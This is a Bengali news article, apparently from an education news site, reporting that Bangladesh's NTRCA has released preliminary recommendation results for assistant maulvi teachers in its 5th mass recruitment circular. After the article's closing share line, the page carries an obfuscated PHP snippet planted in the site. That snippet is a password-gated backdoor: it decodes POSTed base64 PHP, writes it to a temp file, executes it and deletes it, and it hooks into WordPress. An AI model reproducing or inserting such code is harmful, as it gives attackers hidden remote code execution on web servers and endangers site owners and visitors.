সহকারী মৌলভীদের প্রাথমিক সুপারিশের ফল প্রকাশ, দেখুন এখানে


শিক্ষা সংবাদ প্রকাশের সময় : জুন ১২, ২০২৪, ১০:২০ অপরাহ্ণ /
সহকারী মৌলভীদের প্রাথমিক সুপারিশের ফল প্রকাশ, দেখুন এখানে
0Shares

৫ম গণবিজ্ঞপ্তিতে সহকারী মৌলভীদের প্রাথমিক সুপারিশের ফল প্রকাশিত হয়েছে। প্রার্থীদের রোল এবং ব্যাচ নাম্বার দিয়ে ফল দেখা যাচ্ছে।মঙ্গলবার (১২ জুন) সন্ধ্যায় সহকারী মৌলভীদেরন প্রাথমিক সুপারিশের ফল প্রকাশ করে বেসরকারি শিক্ষক নিবন্ধন ও প্রত্যয়ন কর্তৃপক্ষ (এনটিআরসিএ)।

এর আগে গতকাল মঙ্গলবার ৫ম গণবিজ্ঞপ্তির প্রাথমিক সুপারিশের ফল প্রকাশিত হয়। তবে রিট সংক্রান্ত জটিলতার কারণে তাদের সুপারিশ স্থগিত রাখা হয়েছিল।

এ বিষয়ে বুধবার বিকালে এনটিআরসিএ’র সচিব ওবায়দুর রহমান বলেন, সহকারী মৌলভীদের সুপারিশের বিষয়ে আদালত যে স্থগিতাদেশ দিয়েছিল সেটিতে ভ্যাকেট নিয়ে আসা হয়েছে। কাজেই যে কোনো মুহূর্তে তাদের নিয়োগ সুপারিশের ফল প্রকাশ করা হতে পারে।

জানা যায়, গত ৩১ মার্চ বেসরকারি শিক্ষাপ্রতিষ্ঠানে ৯৬ হাজার ৭৩৬টি পদে শিক্ষক নিয়োগের গণবিজ্ঞপ্তি প্রকাশ করা হয়। এর মধ্যে স্কুল অ্যান্ড কলেজে ৪৩ হাজার ২৮৬টি এবং মাদরাসা ও কারিগরি প্রতিষ্ঠানে ৫৩ হাজার ৪৫০টি পদে শিক্ষক নিয়োগ দেওয়ার কথা ছিল।

৫ম গণবিজ্ঞপ্তিতে আবেদন গ্রহণ শেষ হয় গত ৯ মে। ১০ মে রাত ১২টা পর্যন্ত আবেদনের ফি জমা দিতে পেরেছেন আবেদনকারীরা। ৫ম গণবিজ্ঞপ্তিতে আবেদন করেছিলেন ২৩ হাজার ৭৩২ জন। এদের মধ্যে প্রাথমিকভাবে ২২ হাজারের কিছু বেশি প্রার্থীকে নিয়োগের সুপারিশ করা হয়।

সহকারী মৌলভীদের প্রাথমিক সুপারিশের ফল দেখতে ক্লিক করুন এখানে 

0Shares
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}